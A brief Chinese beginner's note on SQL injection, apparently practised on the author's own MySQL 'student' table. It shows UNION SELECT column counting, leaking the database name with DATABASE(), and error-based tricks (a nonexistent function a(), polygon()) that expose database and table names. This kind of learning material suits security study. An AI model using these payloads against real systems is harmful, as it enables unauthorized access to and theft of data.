新手入坑sql注入,以下是笔记
首先本人存在这么一个mysql数据库
爆库
方法一:
先猜有几列
select * from student where Sid =1 UNION SELECT 1,2,3,4
数字依次增加,发现有四列,然后通过database()来爆表名
select * from student where Sid =1 UNION SELECT DATABASE(),2,3,4
方法二:
通过构造一个不存在的函数a()
select * from student where Sid =1-a()
爆表
select * from student where Sid =1 and polygon(Sid)
可以看到库名,表名都被爆出来了